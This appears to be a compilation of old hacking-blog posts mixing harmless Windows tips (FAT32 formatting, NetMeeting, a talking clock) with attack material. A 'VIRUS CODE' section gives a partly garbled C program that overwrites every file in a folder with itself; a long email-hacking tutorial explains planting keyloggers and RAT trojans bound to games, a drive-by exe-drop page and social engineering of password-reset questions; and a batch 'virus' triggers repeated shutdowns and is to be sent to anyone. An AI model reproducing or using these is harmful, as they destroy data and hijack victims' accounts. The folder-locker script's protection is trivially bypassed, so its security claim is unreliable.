An Introduction to Metasploit | What is Metasploit?

An Introduction to Metasploit | What is Metasploit?

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Metasploit was created by HD Moore in 2003 as a portable network tool using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third party security researchers to investigate potential vulnerabilities.
Like comparable commercial products such as Immunity’s CANVAS or Core Security Technologies Core Impact, Metasploit can be used by administrators to test the vulnerability of computer systems in order to protect them, or by Black Hat hackers and script kiddies to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Metasploit Framework.
The basic steps for exploiting a system using the Framework include -

• Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 300 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
•  Checking whether the intended target system is susceptible to the chosen exploit (optional);
•  Choosing and configuring a payload (code that will be executed on the target system upon successful entry, for instance a remote shell or a VNC server);
•  Choosing the encoding technique to encode the payload so that the Intrusion-prevention system will not catch the encoded payload;

Executing the exploit.
This modularity of allowing combining any exploit with any payload is the major advantage of the Framework: it facilitates the tasks of attackers, exploit writers, and payload writers.
For more details click here: – http://www.metasploit.com/

Lock Folder Without Any Software

1.Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
   Any name will do.
2.Then you see a batch file. Double click on this batch file to create a folder locker.
3.New folder named 'Locker' would be formed at the same location.
4.Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
5.If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.


CODE:

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

GoogleTV 2.0 – Setup Application to Run on Startup / Power On

This guide will explain how to set an Application to run on startup and/or power on.  Initially, the default Input is set to run on Power On; we can change this to startup an Application instead.

1.  Go to your Home screen by selecting the Home button on your remote.

2. With the Home screen up, select the Menu button.

3.  Scroll down to “Home and All Apps settings“.

4.  Choose the “Startup Application” option.

The next time you power on your GoogleTV, it should startup the Application you just selected.

How to format external hard drive to FAT32 in Windows

Trying to format a large external USB or Firewire hard drive to the FAT32 file system? Can’t do it? Only see an option for formatting the drive using the NTFS file format? Well if you answered yes any of those questions, then you’re at the right place.
I was recently trying to format my 1 TB MyBook external hard drive in Windows XP to FAT32 instead of the overly forced-upon NTFS format. Why? Well because I needed to connect it to a NAS device and the NTFS permissions were causing the NAS not to be able to access the drive. Simple solution is to use FAT32, no security, no problems. Though it’s sometimes useful to format a USB drive in NTFS format.
Also, formatting a drive in FAT or FAT32 will allow it to be read by other operating systems, such as Mac, Linux, and older versions of Windows such as Windows 98.
Unfortunately, Windows XP and Windows Server 2003 will only format a removable drive in FAT32 if it’s less than 32GB! Hmmm…that pretty much cuts out ALL modern external hard drives!
However, Windows can format a drive that is larger than 32GB in FAT32, but you have to use the DOS command prompt. However, if you have a drive that is 1TB or larger, you may still get an error saying “The volume is too big for FAT32”.
In that case, you can use a free program called SwissKnife that will allow you to format an external hard drive that is up to 2TB in size. Let’s go through both methods. In case you are having problems getting your external hard drive to show up in Windows, read my article on how to change the drive letter for an external drive in Windows.

Format external drive in FAT32 using DOS

Open a command window by going to Start, then Run and typing in CMD.

Now type in the following command at the prompt:

format /FS:FAT32 X:

Replace the letter X with the letter of your external hard drive in Windows. Windows will go ahead and begin formatting the drive in FAT32!

Format external hard drive in FAT32 using SwissKnife

SwissKnife is a nifty little program that is completely free and that you can use to format many types of external drives such as USB, Firewire, PCMIA, SATA and SCSI. You can also use it to create partitions on an external hard drive and it formats faster than Windows.

So next time you want to format a hard drive in FAT32 and Windows only gives you an option for NTFS, make sure to follow one of the two method mentioned above.
                  
                                                                             Enjoy!

Make Windows Speak the Time with TickTalker

Since the clock’s invention by the ancient Egyptian astronomers more than 5,500 years ago, it has now become one of the most important devices humankind has ever created. Clocks serve many purposes. For one, it keeps us updated with our daily activities. Without it the world we know today will cease to exist.
Clocks are available in many forms. It can be worn as a wristwatch, displayed as a house ornament, and integrated to personal computers and other gadgets.
Our computer’s clock is there to remind us of the time. It is usually placed and displayed on the Windows taskbar. It could be nice for some and more practical if the said clock will talk and tell us the current time. The TickTalker software can effectively do this. When launched, this program will automatically tell a computer’s time using Windows’ default voice — Microsoft Anna.
TickTalker can be programmed to tell the time in two intervals: every 30 minutes and every hour. You can also set the software to warn you in advance if the 30-minute and 1-hour intervals are approaching. The warning can be set in pre-defined minutes.
With this application, you can adjust how fast Microsoft Anna will talk. You can also stop the announcements in-between times.
TickTalker can be downloaded at http://gusperez.com/wp/software/ticktalker.

Select the Open with tickbox and press OK. When the download is finished, your archiver will open the zip file. For this illustration, we will use the WinRAR archiver program. The next step is to extract the files to your preferred directory.

After unzipping, go to the location where you extracted the files and double-click TickTalker.exe.

The software will not show you its main interface. Instead, the program’s icon will be placed on your system tray.
TickTalker is now ready to use. It can now announce your computer’s time in 30-minute and 1-hour intervals.

If you want to change some of its properties, right-click its tray icon and hit Settings.

This is the Settings window. In here, you can check and uncheck TickTalker’s time intervals. You can also set here if you want to be warned minutes before the announcement.

The voice who will tell you the time is Microsoft Anna. You can adjust how slow or fast she will talk by dragging the Speaking Rate to the left or right, respectively. You can preview the speaking rate by clicking the Play Sample button.
For the 30-minute and hourly announcements, Anna will say “It’s 1 o’clock PM.”. For the warning, the voice will talk “It’s almost 1 o’clock PM.”.

With TickTalker, you can disable the announcements between two times.

For all your changes to take effect, you must click the OK button.

That’s it! You now will have Windows speak the time to you when you wish. It’s also very useful for people with a vision disability.

Install Net Meeting

       Wondering how to install Netmeeting on Windows XP? Well you don't have to install it! Why? It is already pre-installed with Windows XP, but (by design they say) it isn't linked to anywhere on your programs menu. Here is how to load it:

1: Click START then RUN
2: Enter "conf" without the quotes

That's it - now you can Netmeet to your hearts content.

Folder Options Missing

       Many of us sometimes find the folder options missing in windows explorer due to some virus or trojan effect.
Here's the solution-->
 
Open Run and then type "gpedit.msc".
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

I hopes that you will find the option after restarting windows..

VIRUS CODE

           Run this on your own responsibility*/

/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......

#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)

write(target,buf,byt); else break; } close(source); close(target); done = findnext(&ffblk); } getch(); }

Whether Mail Hacking is possible?

This topic is favourite of all newbies
EMAIL PASSWORD HACKING
First of all it is very difficult to crack any mail server
like yahoo,google,msn etc.
ANd even if you crack into their server it is not possible to decode the password
so just forget abt this method
We will try something different

If u have physical access(direct access) to someone's PC and u want to hack his account password then it is the best thing for us.U don't need anything better than that,all u hv to do is to download a good keylogger to ur pc and copy it in ur pendrive or cd
and install the keylogger in the victim's pc.That's it.

KEYLOGGER:-This are the program which records the every keystrokes on keyboard which means it will record all passwords also.The data will be stored on the victims computer only(they r stored in one file which is usually located in system folder) but as u hv physical access u can access this file easily
some keyloggers are hidden so the victim will not hv ne clue abt it and ur work will be done easily.click here to see how it works

Most of u will say that u don't hv direct access to the victim's pc.It is little difficult to get password if u don't hv direct access to victim's pc.
In this kinda situations u can use trojan's for this.There r many trojans available on internet.U can find many using google.If u want u can scrap in my orkut profile.http://www.orkut.com/Profile.aspx?uid=5276101150478462485

Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.

To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...

On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).

If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.

The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.

So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.

Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.

Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...

While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...

http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8

Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial..

Create Virus

How to create or make or write virus are most common question running in or mind if we are a new learner...This is very simple i have given u a small virus code which creates a highly effected virus.....


@echo
:virus
echo VIIIIIRRRRUUUUSSSS
shutdown -s -t 200 -c "YOU'RE ********ED"
goto virus


copy and paste the above code into word pad and save its as .bat file and send the file to whom ever u want

Actually if u save this file in word pad it saves as a .doc file but to save it as a .bat file u have to save it as "virus.bat" within double quotes instead of virus u can write any name..

Disable Windows Logo Key

How to disable Windows Logo key, i was recently playing games and this nasty windos logo key keep annoying me , cause i often accidently clicked it , and i start to search a solution to solve my problem, and found the following article in microsfot website, and it did work, hope this helps, thanks! click here or in other articles, u can copy the following messages into ur notepad and save as *.reg, and use it..

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
"Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\
00,00,00,00